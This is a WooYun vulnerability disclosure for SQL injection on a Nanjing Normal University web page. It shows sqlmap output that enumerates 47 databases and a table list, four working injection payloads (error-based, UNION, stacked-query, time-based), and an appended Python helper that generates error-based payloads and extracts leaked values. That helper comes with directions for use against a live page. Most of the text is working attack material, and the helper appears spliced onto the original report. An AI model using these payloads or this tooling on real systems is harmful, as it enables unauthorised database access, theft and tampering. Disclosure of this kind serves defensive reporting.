WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
2015-08-23: Details sent to the vendor; awaiting vendor handling
2015-08-24: Vendor confirmed; details visible to the vendor only
2015-09-03: Details disclosed to core white hats and relevant domain experts
2015-09-13: Details disclosed to regular white hats
2015-09-23: Details disclosed to intern white hats
2015-10-08: Details disclosed to the public
SQL injection in a Nanjing Normal University website
1# The vulnerability is in the website of the Psychology Experimental Teaching Center
http://**.**.**.**/xinli/TeaShow.aspx?TypeNo=47&teaNo=7
Both the TypeNo and teaNo parameters are injectable.
2# 47 databases on the instance
The application login 'xinli' is not a DBA, yet it can still enumerate every database on the shared SQL Server instance:
current user: 'xinli'
current database: 'NSXinLiXue'
current user is DBA: False
available databases [47]:
[*] BZBB_lw
[*] ChuangXinNS
[*] db_dike
[*] db_dndqjzw
[*] db_njsdjw
[*] db_njsfsy
[*] db_nsddlhj
[*] db_nsdhgxn
[*] db_nsdmba
[*] db_nsdMediaC
[*] db_nsdscw
[*] db_nsdsw
[*] db_nsdswyy
[*] db_nsdswzy
[*] db_nyspjc
[*] db_sdjxjy
[*] db_spaqjc
[*] JiaoCai
[*] master
[*] MBA
[*] model
[*] msdb
[*] njnulab
[*] njnupj
[*] nju
[*] nju2222
[*] njuold
[*] njupj2012
[*] Northwind
[*] NSD_ApplicationChemical
[*] NSD_Cnooc
[*] NSD_ElectricalEngineering
[*] NSD_ElectronicInformation
[*] NSD_TeacherSkills
[*] NSD_TeachingTeam
[*] nsddky_sy
[*] nsdsfjdzx
[*] nsdsfjdzxnew
[*] nsglxt
[*] NSHuaKe
[*] NSXinLiXue
[*] NY_JG
[*] pubs
[*] ShangXueYuannew
[*] tempdb
[*] zhongxin
[*] zhongxinold
3# Tables in the zhongxin database
Database: zhongxin
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.tongji              | 1853    |
| dbo.dike_sqb            | 1480    |
| dbo.chuanmei_News       | 869     |
| dbo.news                | 404     |
| dbo.faxue_News          | 279     |
| dbo.meishu_News         | 169     |
| dbo.dianqi_News         | 135     |
| dbo.sw_News             | 101     |
| dbo.jinnv_News          | 95      |
| dbo.sw_links            | 88      |
| dbo.dianqi_szdw         | 82      |
| dbo.chuanmei_SmallClass | 71      |
| dbo.classurl            | 69      |
| dbo.xinli_News          | 69      |
| dbo.dike_szdw           | 60      |
| dbo.dike_News           | 55      |
| dbo.jiaoyu_News         | 48      |
| dbo.meishu_SmallClass   | 44      |
| dbo.faxue_down          | 43      |
| dbo.huaxue_News         | 43      |
| dbo.huaxue_SmallClass   | 43      |
| dbo.meishu_szdw         | 33      |
| dbo.dike_SmallClass     | 30      |
| dbo.sw_down             | 21      |
| dbo.meishu_sqb          | 20      |
| dbo.dike_szdwzdy        | 19      |
| dbo.dianqi_down         | 18      |
| dbo.meishu_down         | 18      |
| dbo.dike_down           | 17      |
| dbo.faxue_SmallClass    | 16      |
| dbo.huaxue_szdw         | 15      |
| dbo.jinnv_down          | 15      |
| dbo.xinli_down          | 15      |
| dbo.chuanmei_BigClass   | 13      |
| dbo.dike_BigClass       | 13      |
| dbo.faxue_szdw          | 13      |
| dbo.huaxue_BigClass     | 13      |
| dbo.sw_SmallClass       | 13      |
| dbo.sysconstraints      | 13      |
| dbo.faxue_BigClass      | 12      |
| dbo.jinnv_szdw          | 12      |
| dbo.sw_szdw             | 12      |
| dbo.faxue_sqb           | 11      |
| dbo.chaunmei_sqb        | 10      |
| dbo.chuanmei_down       | 10      |
| dbo.dianqi_BigClass     | 10      |
| dbo.dianqi_sqb          | 10      |
| dbo.jiaoyu_down         | 10      |
| dbo.jiaoyu_SmallClass   | 10      |
| dbo.jinnv_sqb           | 10      |
| dbo.sw_sqb              | 10      |
| dbo.xinli_BigClass      | 10      |
| dbo.xinli_sqb           | 10      |
| dbo.chuanmei_links      | 9       |
| dbo.jiaoyu_BigClass     | 9       |
| dbo.jinnv_BigClass      | 9       |
| dbo.jinnv_SmallClass    | 9       |
| dbo.meishu_BigClass     | 9       |
| dbo.sw_BigClass         | 9       |
| dbo.xinli_SmallClass    | 9       |
| dbo.jinnv_links         | 8       |
| dbo.dianqi_SmallClass   | 6       |
| dbo.link                | 6       |
| dbo.Admin               | 5       |
| dbo.huaxue_down         | 5       |
| dbo.dianqi_links        | 4       |
| dbo.dike_gg             | 4       |
| dbo.meishu_gg           | 4       |
| dbo.sw_gg               | 4       |
| dbo.chuanmei_szdw       | 3       |
| dbo.syssegments         | 3       |
| dbo.xinli_Vote          | 3       |
| dbo.chuanmei_gg         | 2       |
| dbo.dianqi_gg           | 2       |
| dbo.faxue_links         | 2       |
| dbo.jiaoyu_gg           | 2       |
| dbo.jinnv_gg            | 2       |
| dbo.xinli_gg            | 2       |
| dbo.faxue_gg            | 1       |
| dbo.jiaoyu_szdw         | 1       |
| dbo.xinli_links         | 1       |
| dbo.xinli_szdw          | 1       |
+-------------------------+---------+
4# There are too many databases, so I did not go through them one by one.
sqlmap's summary of the injection point:
Place: GET
Parameter: TypeNo
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TypeNo=47' AND 6611=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(120)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6611=6611) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(104)+CHAR(108)+CHAR(58))) AND 'Kchf'='Kchf&teaNo=7

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: TypeNo=47' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(111)+CHAR(120)+CHAR(114)+CHAR(58)+CHAR(98)+CHAR(82)+CHAR(73)+CHAR(99)+CHAR(102)+CHAR(88)+CHAR(117)+CHAR(86)+CHAR(104)+CHAR(87)+CHAR(58)+CHAR(117)+CHAR(104)+CHAR(108)+CHAR(58)-- &teaNo=7

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TypeNo=47'; WAITFOR DELAY '0:0:5'--&teaNo=7

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TypeNo=47' WAITFOR DELAY '0:0:5'--&teaNo=7
Note that stacked queries were confirmed: an attacker can append statements of their own choosing to the batch, which then run with the 'xinli' login's rights, so the impact is not limited to reading data.
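The error-based payload above is easier to read once the CHAR() chains are decoded and the marker trick is spelled out. What follows is an added example, not code from the report or from sqlmap: it decodes the CHAR() chains into the ':oxr:' and ':uhl:' markers, rebuilds the report's CONVERT(INT, ...) payload for an arbitrary string-valued subquery, and parses the SQL Server conversion error to recover whatever value the markers enclose. The base value 47, the 6611 comparison and the 'Kchf' closing string are reproduced from the report's payload; the DB_NAME() subquery and the two sample error messages are constructed for illustration and were not captured from the target.

```python
import re

# Added example, not code from the original report or from sqlmap. The
# payload shape is reconstructed from the sqlmap output quoted in the report;
# the error messages used as sample input below are constructed, not captured.

# sqlmap wraps the value it wants to leak between two fixed markers so it can
# cut the value out of the error text. Decoded from the report's payload:
#   CHAR(58)+CHAR(111)+CHAR(120)+CHAR(114)+CHAR(58)  ->  ':oxr:'
#   CHAR(58)+CHAR(117)+CHAR(104)+CHAR(108)+CHAR(58)  ->  ':uhl:'
PREFIX = ":oxr:"
SUFFIX = ":uhl:"


def decode_char_concat(expr):
    """Turn a T-SQL CHAR(n)+CHAR(m)+... chain into the string it evaluates to."""
    return "".join(chr(int(code)) for code in re.findall(r"CHAR\((\d+)\)", expr))


def encode_char_concat(text):
    """Inverse of decode_char_concat: emit a CHAR() chain so the payload needs no quote characters."""
    return "+".join("CHAR(%d)" % ord(ch) for ch in text)


def error_based_payload(subquery, base_value="47", prefix=PREFIX, suffix=SUFFIX):
    """Build a TypeNo value that makes SQL Server echo `subquery` inside a conversion error.

    CONVERT(INT, ':oxr:' + <string> + ':uhl:') always fails, and the error text
    quotes the offending value verbatim, so the subquery's result comes back in
    the page's error output. `subquery` must yield a string: wrap numeric columns
    in CAST(... AS NVARCHAR(4000)) first, otherwise + becomes arithmetic and the
    markers themselves fail to convert before the value is concatenated.
    """
    inner = "%s+(%s)+%s" % (encode_char_concat(prefix), subquery, encode_char_concat(suffix))
    return "%s' AND 6611=CONVERT(INT,(%s)) AND 'Kchf'='Kchf" % (base_value, inner)


def condition_payload(condition, **kw):
    """Boolean probe in the report's form: leak '1' when `condition` holds, else '0'."""
    return error_based_payload(
        "SELECT (CASE WHEN (%s) THEN CHAR(49) ELSE CHAR(48) END)" % condition, **kw)


def extract_leaked_value(error_text, prefix=PREFIX, suffix=SUFFIX):
    """Cut the value out of a SQL Server conversion error; None if the markers are absent."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text, re.S)
    return m.group(1) if m else None


def condition_holds(error_text):
    """Interpret a condition_payload() response. None means nothing leaked (no injection, or errors hidden)."""
    value = extract_leaked_value(error_text)
    return None if value is None else value == "1"


# Constructed sample responses in the two wordings SQL Server uses for this
# error (2008 and later first, 2000/2005 second). Not captured from the target.
SAMPLE_ERROR_NEW = ("Conversion failed when converting the varchar value "
                    "':oxr:NSXinLiXue:uhl:' to data type int.")
SAMPLE_ERROR_OLD = ("Syntax error converting the varchar value ':oxr:1:uhl:' "
                    "to a column of data type int.")
SAMPLE_NO_LEAK = "Server Error in '/' Application. Runtime Error"

if __name__ == "__main__":
    print(decode_char_concat("CHAR(58)+CHAR(111)+CHAR(120)+CHAR(114)+CHAR(58)"))
    print(error_based_payload("SELECT DB_NAME()"))   # DB_NAME() is an illustrative subquery
    print(condition_payload("6611=6611"))            # reproduces the report's payload exactly
    print(extract_leaked_value(SAMPLE_ERROR_NEW))
    print(condition_holds(SAMPLE_ERROR_OLD), condition_holds(SAMPLE_NO_LEAK))
```

To use this against a live page the payload goes URL-encoded into the TypeNo parameter and the response body goes through extract_leaked_value(); if the application hides error details (custom errors enabled), this channel returns None and only the time-based and UNION techniques listed above remain.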
Other pages most likely have injection points too; a check of the whole site is recommended.
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2015-08-24 08:22
Vendor reply: notified the user, being handled
Latest status: none